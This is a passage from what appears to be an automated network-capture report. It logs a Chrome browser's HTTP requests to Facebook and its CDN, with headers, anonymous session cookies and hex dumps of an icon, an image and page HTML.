                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                  2024-09-29 04:53:25 UTC1879INHTTP/1.1 200 OK
                                                                                                                                                                                                                                  Content-Type: image/x-icon
                                                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                  Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
                                                                                                                                                                                                                                  content-md5: jN3KQn2um5Jec0MvhzPgWg==
                                                                                                                                                                                                                                  Expires: Sat, 20 Sep 2025 06:34:52 GMT
                                                                                                                                                                                                                                  Cache-Control: public,max-age=31536000,immutable
                                                                                                                                                                                                                                  report-to: {"max_age":21600,"endpoints":[{"url":"https:\/\/www.xx.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"}
                                                                                                                                                                                                                                  timing-allow-origin: *
                                                                                                                                                                                                                                  document-policy: force-load-at-top
                                                                                                                                                                                                                                  permissions-policy: accelerometer=(), attribution-reporting=(), autoplay=(), bluetooth=(), camera=(), ch-device-memory=(), ch-downlink=(), ch-dpr=(), ch-ect=(), ch-rtt=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), ch-viewport-height=(), ch-viewport-width=(), ch-width=(), clipboard-read=(), clipboard-write=(), compute-pressure=(), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), interest-cohort=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(), midi=(), otp-credentials=(), payment=(), picture-in-picture=(), private-state-token-issuance=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), shared-storage=(), shared-storage-select-url=(), private-state-token-redemption=(), usb=(), unload=(self), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"
                                                                                                                                                                                                                                  cross-origin-resource-policy: cross-origin
                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                  reporting-endpoints: permissions_policy="https://www.xx.facebook.com/ajax/browser_error_reports/"
                                                                                                                                                                                                                                  origin-agent-cluster: ?1
                                                                                                                                                                                                                                  X-FB-Debug: H/IsKeQVBYhqYAX/jwGQ/uZRZXOcj5X1GHJFUHRXrpnmLtePG8B4Y8RbUgwTvV2COSnR3L6cHKcT+YVudiFkVQ==
                                                                                                                                                                                                                                  Date: Sun, 29 Sep 2024 04:53:25 GMT
                                                                                                                                                                                                                                  X-FB-Connection-Quality: GOOD; q=0.7, rtt=88, rtx=0, c=14, mss=1392, tbw=3412, tp=-1, tpl=-1, uplat=0, ullat=-1
                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                  Content-Length: 4286
                                                                                                                                                                                                                                  2024-09-29 04:53:25 UTC1INData Raw: 00
                                                                                                                                                                                                                                  Data Ascii:
                                                                                                                                                                                                                                  2024-09-29 04:53:25 UTC4285INData Raw: 00 01 00 01 00 20 20 00 00 01 00 20 00 a8 10 00 00 16 00 00 00 28 00 00 00 20 00 00 00 40 00 00 00 01 00 20 00 00 00 00 00 00 10 00 00 c2 1e 00 00 c2 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff 80 00 06 e2 65 04 47 e0 63 00 95 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff e0 64 00 bf e0 63 00 95 e2 65 00 47 ff 80 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ea 6a 0b 18 e2 66 02 96 e1 66 01 f1 e2 66 01 ff e1 65 01 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
                                                                                                                                                                                                                                  Data Ascii: ( @ eGcdceGjfffe


                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                  92192.168.2.649819157.240.0.354431060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                  2024-09-29 04:53:25 UTC874OUTGET /ajax/bz?__a=1&__ccg=GOOD&__dyn=7xe6E5aQ1PyUbFp41twpUnwgU29zE6u7E3rw5ux60Vo1upE4W0OE2WxO0FE2awt81s8hwnU1e42C1Fwc60D830wbu0RE2Jw8Xwn83fw5rwSyE1582ZwrU1w86O1FwgU1do7u1rw&__hs=19995.BP%3ADEFAULT.2.0..0.0&__hsi=7419923633127123911&__req=3&__rev=1016900551&__s=8mcer0%3Aeat7lj%3A1dha06&__spin_b=trunk&__spin_r=1016900551&__spin_t=1727585595&__user=0&dpr=1&jazoest=2941&locale=ru_RU&lsd=AVrc04HtcqM HTTP/1.1
                                                                                                                                                                                                                                  Host: www.facebook.com
                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                  Cookie: fr=0QHepad51NLqNU46q..Bm-N07..AAA.0.0.Bm-N07.AWXuojQA4po; sb=O934ZizfugwK86As5FvnwEDL; _js_datr=O934ZvtQ_C-R3ZM0Ae39F-hF; wd=1280x907
                                                                                                                                                                                                                                  2024-09-29 04:53:25 UTC747INHTTP/1.1 200 OK
                                                                                                                                                                                                                                  reporting-endpoints: coop_report="https://www.facebook.com/browser_reporting/coop/?minimize=0", default="https://www.facebook.com/ajax/browser_error_reports/?device_level=unknown&brsid=7419923674840321864", permissions_policy="https://www.facebook.com/ajax/browser_error_reports/"
                                                                                                                                                                                                                                  report-to: {"max_age":2592000,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coop\/?minimize=0"}],"group":"coop_report","include_subdomains":true}, {"max_age":259200,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/?device_level=unknown&brsid=7419923674840321864"}]}, {"max_age":21600,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"}
                                                                                                                                                                                                                                  2024-09-29 04:53:25 UTC1859INData Raw: 63 6f 6e 74 65 6e 74 2d 73 65 63 75 72 69 74 79 2d 70 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 64 61 74 61 3a 20 62 6c 6f 62 3a 20 27 73 65 6c 66 27 20 68 74 74 70 73 3a 2f 2f 2a 2e 66 62 73 62 78 2e 63 6f 6d 20 27 75 6e 73 61 66 65 2d 69 6e 6c 69 6e 65 27 20 2a 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 20 2a 2e 66 62 63 64 6e 2e 6e 65 74 20 27 75 6e 73 61 66 65 2d 65 76 61 6c 27 3b 73 63 72 69 70 74 2d 73 72 63 20 2a 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 20 2a 2e 66 62 63 64 6e 2e 6e 65 74 20 2a 2e 66 61 63 65 62 6f 6f 6b 2e 6e 65 74 20 31 32 37 2e 30 2e 30 2e 31 3a 2a 20 27 75 6e 73 61 66 65 2d 69 6e 6c 69 6e 65 27 20 62 6c 6f 62 3a 20 64 61 74 61 3a 20 27 73 65 6c 66 27 20 63 6f 6e 6e 65 63 74 2e 66 61 63 65 62 6f 6f 6b 2e 6e 65 74 20 27
                                                                                                                                                                                                                                  Data Ascii: content-security-policy: default-src data: blob: 'self' https://*.fbsbx.com 'unsafe-inline' *.facebook.com *.fbcdn.net 'unsafe-eval';script-src *.facebook.com *.fbcdn.net *.facebook.net 127.0.0.1:* 'unsafe-inline' blob: data: 'self' connect.facebook.net '
                                                                                                                                                                                                                                  2024-09-29 04:53:25 UTC1706INData Raw: 70 65 72 6d 69 73 73 69 6f 6e 73 2d 70 6f 6c 69 63 79 3a 20 61 63 63 65 6c 65 72 6f 6d 65 74 65 72 3d 28 29 2c 20 61 74 74 72 69 62 75 74 69 6f 6e 2d 72 65 70 6f 72 74 69 6e 67 3d 28 73 65 6c 66 29 2c 20 61 75 74 6f 70 6c 61 79 3d 28 29 2c 20 62 6c 75 65 74 6f 6f 74 68 3d 28 29 2c 20 62 72 6f 77 73 69 6e 67 2d 74 6f 70 69 63 73 3d 28 73 65 6c 66 29 2c 20 63 61 6d 65 72 61 3d 28 73 65 6c 66 29 2c 20 63 68 2d 64 65 76 69 63 65 2d 6d 65 6d 6f 72 79 3d 28 29 2c 20 63 68 2d 64 6f 77 6e 6c 69 6e 6b 3d 28 29 2c 20 63 68 2d 64 70 72 3d 28 29 2c 20 63 68 2d 65 63 74 3d 28 29 2c 20 63 68 2d 72 74 74 3d 28 29 2c 20 63 68 2d 73 61 76 65 2d 64 61 74 61 3d 28 29 2c 20 63 68 2d 75 61 2d 61 72 63 68 3d 28 29 2c 20 63 68 2d 75 61 2d 62 69 74 6e 65 73 73 3d 28 29 2c 20 63
                                                                                                                                                                                                                                  Data Ascii: permissions-policy: accelerometer=(), attribution-reporting=(self), autoplay=(), bluetooth=(), browsing-topics=(self), camera=(self), ch-device-memory=(), ch-downlink=(), ch-dpr=(), ch-ect=(), ch-rtt=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), c


                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                  93192.168.2.649820157.240.251.94431060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                  2024-09-29 04:53:25 UTC611OUTGET /rsrc.php/v3/y0/r/eFZD1KABzRA.png HTTP/1.1
                                                                                                                                                                                                                                  Host: static.xx.fbcdn.net
                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                  Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                  Sec-Fetch-Dest: image
                                                                                                                                                                                                                                  Referer: https://www.facebook.com/
                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                  2024-09-29 04:53:25 UTC1876INHTTP/1.1 200 OK
                                                                                                                                                                                                                                  Content-Type: image/png
                                                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                  Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
                                                                                                                                                                                                                                  content-md5: ZFLtdcU+Go6QpmTfGJWakA==
                                                                                                                                                                                                                                  Expires: Sat, 20 Sep 2025 00:48:08 GMT
                                                                                                                                                                                                                                  Cache-Control: public,max-age=31536000,immutable
                                                                                                                                                                                                                                  report-to: {"max_age":21600,"endpoints":[{"url":"https:\/\/www.xx.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"}
                                                                                                                                                                                                                                  timing-allow-origin: *
                                                                                                                                                                                                                                  document-policy: force-load-at-top
                                                                                                                                                                                                                                  permissions-policy: accelerometer=(), attribution-reporting=(), autoplay=(), bluetooth=(), camera=(), ch-device-memory=(), ch-downlink=(), ch-dpr=(), ch-ect=(), ch-rtt=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), ch-viewport-height=(), ch-viewport-width=(), ch-width=(), clipboard-read=(), clipboard-write=(), compute-pressure=(), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), interest-cohort=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(), midi=(), otp-credentials=(), payment=(), picture-in-picture=(), private-state-token-issuance=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), shared-storage=(), shared-storage-select-url=(), private-state-token-redemption=(), usb=(), unload=(self), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"
                                                                                                                                                                                                                                  cross-origin-resource-policy: cross-origin
                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                  reporting-endpoints: permissions_policy="https://www.xx.facebook.com/ajax/browser_error_reports/"
                                                                                                                                                                                                                                  origin-agent-cluster: ?1
                                                                                                                                                                                                                                  X-FB-Debug: MWiE8ZMCCH8oNh0/MD4Kj/wtOLwg85/ei6gnDxEH0HAR+o/5XoRifb+n+13xL+UlZ1Ppkq0jZ/4JlGN1o60g/Q==
                                                                                                                                                                                                                                  Date: Sun, 29 Sep 2024 04:53:25 GMT
                                                                                                                                                                                                                                  X-FB-Connection-Quality: GOOD; q=0.7, rtt=88, rtx=0, c=14, mss=1392, tbw=3411, tp=-1, tpl=-1, uplat=0, ullat=-1
                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                  Content-Length: 2106
                                                                                                                                                                                                                                  2024-09-29 04:53:25 UTC1INData Raw: 89
                                                                                                                                                                                                                                  Data Ascii:
                                                                                                                                                                                                                                  2024-09-29 04:53:25 UTC2102INData Raw: 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 c0 00 00 00 c0 08 03 00 00 00 65 02 9c 35 00 00 01 59 50 4c 54 45 47 70 4c 05 65 ff 08 65 ff 07 65 ff 10 70 ff 07 65 ff 08 66 ff 08 66 ff 08 68 ff 08 66 ff 07 66 ff 00 60 ff 10 60 ff ff ff ff 08 67 ff 07 66 ff 08 66 ff 08 67 ff 08 67 ff 08 66 ff 08 66 ff 08 66 ff 08 67 ff 07 66 ff 08 68 ff 09 65 ff 08 66 ff 08 64 ff 09 67 ff 07 65 ff 07 65 ff 06 63 ff 0a 66 ff 07 66 ff 08 65 ff 07 66 ff 09 67 ff 06 67 ff 08 65 ff 08 66 ff 08 66 ff ff ff ff ff ff ff 08 69 ff 08 68 ff 07 65 ff 09 66 ff 07 66 ff ff ff ff 0b 65 ff ff ff ff ff ff ff 07 65 ff 07 67 ff 07 66 ff 07 66 ff 0a 66 ff 09 66 ff 07 66 ff 09 66 ff 07 67 ff ff ff ff ff ff ff 06 66 ff 08 65 ff 07 65 ff ff ff ff 87 b7 ff 46 8c ff ff ff ff ff ff ff ff ff
                                                                                                                                                                                                                                  Data Ascii: PNGIHDRe5YPLTEGpLeeepeffhff``gffggfffgfhefdgeecffefggeffiheffeegffffffgfeeF
                                                                                                                                                                                                                                  2024-09-29 04:53:25 UTC3INData Raw: 42 60 82
                                                                                                                                                                                                                                  Data Ascii: B`


                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                  94192.168.2.649821157.240.0.354431060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                  2024-09-29 04:53:25 UTC503OUTGET /shared/user_preferences/ HTTP/1.1
                                                                                                                                                                                                                                  Host: www.facebook.com
                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                  Cookie: fr=0QHepad51NLqNU46q..Bm-N07..AAA.0.0.Bm-N07.AWXuojQA4po; sb=O934ZizfugwK86As5FvnwEDL; wd=1280x907; datr=O934ZvtQ_C-R3ZM0Ae39F-hF
                                                                                                                                                                                                                                  2024-09-29 04:53:26 UTC310INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                                                                  Strict-Transport-Security: max-age=15552000; preload
                                                                                                                                                                                                                                  Content-Type: text/html; charset="utf-8"
                                                                                                                                                                                                                                  X-FB-Debug: M5/p1aPhym2t/lNZkCgy8Pwklloar4OJtsseSKs3cN9E6Oa71pqH83ABS3A5tKaZ4GBnMm4ccluODWJkCGy8DA==
                                                                                                                                                                                                                                  Date: Sun, 29 Sep 2024 04:53:25 GMT
                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                  2024-09-29 04:53:26 UTC2665INData Raw: 50 72 6f 78 79 2d 53 74 61 74 75 73 3a 20 68 74 74 70 5f 72 65 71 75 65 73 74 5f 65 72 72 6f 72 3b 20 65 5f 66 62 5f 63 6f 6e 66 69 67 76 65 72 73 69 6f 6e 3d 22 41 63 49 6f 6e 68 30 43 7a 32 49 36 52 30 51 6a 57 2d 38 44 49 45 5f 69 4c 52 35 31 53 6d 4c 54 4f 4e 68 4e 5a 77 4a 41 6a 72 44 6e 42 4f 59 65 30 37 50 49 74 45 51 6b 4a 55 72 6d 69 77 22 3b 20 65 5f 63 6c 69 65 6e 74 61 64 64 72 3d 22 41 63 49 48 6f 70 4a 52 33 6d 47 6d 35 72 6a 6a 66 48 4a 5f 4d 62 50 6e 2d 73 4d 4a 37 6a 59 6f 38 46 42 72 51 58 67 62 68 67 77 70 55 5f 44 50 78 64 79 4d 75 70 6f 6a 68 77 66 54 5a 4d 6d 69 69 33 5f 62 42 4b 77 59 70 51 30 32 36 4a 70 6a 75 4c 34 69 42 36 61 76 71 61 52 65 4c 33 77 41 65 7a 71 64 41 30 74 6f 43 33 34 5f 41 67 50 74 41 77 22 3b 20 65 5f 66 62 5f
                                                                                                                                                                                                                                  Data Ascii: Proxy-Status: http_request_error; e_fb_configversion="AcIonh0Cz2I6R0QjW-8DIE_iLR51SmLTONhNZwJAjrDnBOYe07PItEQkJUrmiw"; e_clientaddr="AcIHopJR3mGm5rjjfHJ_MbPn-sMJ7jYo8FBrQXgbhgwpU_DPxdyMupojhwfTZMmii3_bBKwYpQ026JpjuL4iB6avqaReL3wAezqdA0toC34_AgPtAw"; e_fb_
                                                                                                                                                                                                                                  2024-09-29 04:53:26 UTC51INData Raw: 41 6c 74 2d 53 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 38 36 34 30 30 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 0d 0a
                                                                                                                                                                                                                                  Data Ascii: Alt-Svc: h3=":443"; ma=86400Connection: close
                                                                                                                                                                                                                                  2024-09-29 04:53:26 UTC1474INData Raw: 61 66 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 69 64 3d 22 66 61 63 65 62 6f 6f 6b 22 20 63 6c 61 73 73 3d 22 6e 6f 5f 6a 73 22 3e 0a 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 6f 72 69 67 69 6e 2d 77 68 65 6e 2d 63 72 6f 73 73 6f 72 69 67 69 6e 22 20 69 64 3d 22 6d 65 74 61 5f 72 65 66 65 72 72 65 72 22 20 2f 3e 3c 73 63 72 69 70 74 20 6e 6f 6e 63 65 3d 22 7a 33 45 46 36 4d 50 4c 22 3e 66 75 6e 63 74 69 6f 6e 20 65 6e 76 46 6c 75 73 68 28 61 29 7b 66 75 6e 63 74 69 6f 6e 20 62 28 62 29 7b 66 6f 72 28 76 61 72 20 63 20 69 6e 20 61 29 62 5b 63 5d 3d 61 5b
                                                                                                                                                                                                                                  Data Ascii: aff<!DOCTYPE html><html lang="en" id="facebook" class="no_js"><head><meta charset="utf-8" /><meta name="referrer" content="origin-when-crossorigin" id="meta_referrer" /><script nonce="z3EF6MPL">function envFlush(a){function b(b){for(var c in a)b[c]=a[
                                                                                                                                                                                                                                  2024-09-29 04:53:26 UTC1500INData Raw: 70 2f 79 62 2f 72 2f 68 4c 52 4a 31 47 47 5f 79 30 4a 2e 69 63 6f 22 20 2f 3e 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 2f 72 73 72 63 2e 70 68 70 2f 76 33 2f 79 58 2f 6c 2f 30 2c 63 72 6f 73 73 2f 63 61 63 34 39 51 74 47 32 4c 64 2e 63 73 73 22 20 64 61 74 61 2d 62 6f 6f 74 6c 6f 61 64 65 72 2d 68 61 73 68 3d 22 77 58 61 56 6f 6c 67 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61
                                                                                                                                                                                                                                  Data Ascii: p/yb/r/hLRJ1GG_y0J.ico" /><link type="text/css" rel="stylesheet" href="https://static.xx.fbcdn.net/rsrc.php/v3/yX/l/0,cross/cac49QtG2Ld.css" data-bootloader-hash="wXaVolg" crossorigin="anonymous" /><link type="text/css" rel="stylesheet" href="https://sta
                                                                                                                                                                                                                                  2024-09-29 04:53:26 UTC1500INData Raw: 3a 5b 22 63 6c 65 61 72 54 69 6d 65 6f 75 74 57 57 57 4f 72 4d 6f 62 69 6c 65 22 2c 6e 75 6c 6c 5d 7d 2c 2d 31 5d 2c 5b 22 63 72 3a 34 33 34 34 22 2c 5b 22 73 65 74 54 69 6d 65 6f 75 74 57 57 57 4f 72 4d 6f 62 69 6c 65 22 5d 2c 7b 22 5f 5f 72 63 22 3a 5b 22 73 65 74 54 69 6d 65 6f 75 74 57 57 57 4f 72 4d 6f 62 69 6c 65 22 2c 6e 75 6c 6c 5d 7d 2c 2d 31 5d 2c 5b 22 63 72 3a 36 36 34 30 22 2c 5b 22 50 72 6f 6d 69 73 65 49 6d 70 6c 22 5d 2c 7b 22 5f 5f 72 63 22 3a 5b 22 50 72 6f 6d 69 73 65 49 6d 70 6c 22 2c 6e 75 6c 6c 5d 7d 2c 2d 31 5d 2c 5b 22 63 72 3a 38 39 35 38 22 2c 5b 22 46 42 4a 53 4f 4e 22 5d 2c 7b 22 5f 5f 72 63 22 3a 5b 22 46 42 4a 53 4f 4e 22 2c 6e 75 6c 6c 5d 7d 2c 2d 31 5d 2c 5b 22 63 72 3a 31 30 37 38 22 2c 5b 5d 2c 7b 22 5f 5f 72 63 22 3a 5b
                                                                                                                                                                                                                                  Data Ascii: :["clearTimeoutWWWOrMobile",null]},-1],["cr:4344",["setTimeoutWWWOrMobile"],{"__rc":["setTimeoutWWWOrMobile",null]},-1],["cr:6640",["PromiseImpl"],{"__rc":["PromiseImpl",null]},-1],["cr:8958",["FBJSON"],{"__rc":["FBJSON",null]},-1],["cr:1078",[],{"__rc":[
                                                                                                                                                                                                                                  2024-09-29 04:53:26 UTC1500INData Raw: 61 63 6b 6c 69 73 74 22 3a 5b 22 6e 6f 6e 63 65 22 2c 22 61 63 63 65 73 73 5f 74 6f 6b 65 6e 22 2c 22 6f 61 75 74 68 5f 74 6f 6b 65 6e 22 2c 22 78 73 22 2c 22 63 68 65 63 6b 70 6f 69 6e 74 5f 64 61 74 61 22 2c 22 63 6f 64 65 22 5d 7d 2c 31 33 37 5d 2c 5b 22 43 6f 6f 6b 69 65 50 72 69 76 61 63 79 53 61 6e 64 62 6f 78 43 6f 6e 66 69 67 22 2c 5b 5d 2c 7b 22 69 73 5f 61 66 66 65 63 74 65 64 5f 62 79 5f 73 61 6d 65 73 69 74 65 5f 6c 61 78 22 3a 66 61 6c 73 65 7d 2c 37 37 32 33 5d 2c 5b 22 43 6f 6d 65 74 50 65 72 73 69 73 74 51 75 65 72 79 50 61 72 61 6d 73 22 2c 5b 5d 2c 7b 22 72 65 6c 61 74 69 76 65 22 3a 7b 7d 2c 22 64 6f 6d 61 69 6e 22 3a 7b 7d 7d 2c 36 32 33 31 5d 2c 5b 22 43 6f 6f 6b 69 65 44 6f 6d 61 69 6e 22 2c 5b 5d 2c 7b 22 64 6f 6d 61 69 6e 22 3a 22
                                                                                                                                                                                                                                  Data Ascii: acklist":["nonce","access_token","oauth_token","xs","checkpoint_data","code"]},137],["CookiePrivacySandboxConfig",[],{"is_affected_by_samesite_lax":false},7723],["CometPersistQueryParams",[],{"relative":{},"domain":{}},6231],["CookieDomain",[],{"domain":"
                                                                                                                                                                                                                                  2024-09-29 04:53:26 UTC1500INData Raw: 49 44 22 3a 22 30 22 2c 22 4e 41 4d 45 22 3a 22 22 2c 22 53 48 4f 52 54 5f 4e 41 4d 45 22 3a 6e 75 6c 6c 2c 22 49 53 5f 42 55 53 49 4e 45 53 53 5f 50 45 52 53 4f 4e 5f 41 43 43 4f 55 4e 54 22 3a 66 61 6c 73 65 2c 22 48 41 53 5f 53 45 43 4f 4e 44 41 52 59 5f 42 55 53 49 4e 45 53 53 5f 50 45 52 53 4f 4e 22 3a 66 61 6c 73 65 2c 22 49 53 5f 46 41 43 45 42 4f 4f 4b 5f 57 4f 52 4b 5f 41 43 43 4f 55 4e 54 22 3a 66 61 6c 73 65 2c 22 49 53 5f 49 4e 53 54 41 47 52 41 4d 5f 42 55 53 49 4e 45 53 53 5f 50 45 52 53 4f 4e 22 3a 66 61 6c 73 65 2c 22 49 53 5f 4d 45 53 53 45 4e 47 45 52 5f 4f 4e 4c 59 5f 55 53 45 52 22 3a 66 61 6c 73 65 2c 22 49 53 5f 44 45 41 43 54 49 56 41 54 45 44 5f 41 4c 4c 4f 57 45 44 5f 4f 4e 5f 4d 45 53 53 45 4e 47 45 52 22 3a 66 61 6c 73 65 2c 22
                                                                                                                                                                                                                                  Data Ascii: ID":"0","NAME":"","SHORT_NAME":null,"IS_BUSINESS_PERSON_ACCOUNT":false,"HAS_SECONDARY_BUSINESS_PERSON":false,"IS_FACEBOOK_WORK_ACCOUNT":false,"IS_INSTAGRAM_BUSINESS_PERSON":false,"IS_MESSENGER_ONLY_USER":false,"IS_DEACTIVATED_ALLOWED_ON_MESSENGER":false,"
                                                                                                                                                                                                                                  2024-09-29 04:53:26 UTC1500INData Raw: 69 6c 6c 53 65 74 49 6d 6d 65 64 69 61 74 65 47 4b 22 2c 5b 5d 2c 7b 22 77 77 77 5f 61 6c 77 61 79 73 5f 75 73 65 5f 70 6f 6c 79 66 69 6c 6c 5f 73 65 74 69 6d 6d 65 64 69 61 74 65 22 3a 66 61 6c 73 65 7d 2c 32 31 39 30 5d 2c 5b 22 4a 53 45 72 72 6f 72 4c 6f 67 67 69 6e 67 43 6f 6e 66 69 67 22 2c 5b 5d 2c 7b 22 61 70 70 49 64 22 3a 32 35 36 32 38 31 30 34 30 35 35 38 2c 22 65 78 74 72 61 22 3a 5b 5d 2c 22 72 65 70 6f 72 74 49 6e 74 65 72 76 61 6c 22 3a 35 30 2c 22 73 61 6d 70 6c 65 57 65 69 67 68 74 22 3a 6e 75 6c 6c 2c 22 73 61 6d 70 6c 65 57 65 69 67 68 74 4b 65 79 22 3a 22 5f 5f 6a 73 73 65 73 77 22 2c 22 70 72 6f 6a 65 63 74 42 6c 6f 63 6b 6c 69 73 74 22 3a 5b 5d 7d 2c 32 37 37 36 5d 2c 5b 22 44 61 74 61 53 74 6f 72 65 43 6f 6e 66 69 67 22 2c 5b 5d 2c
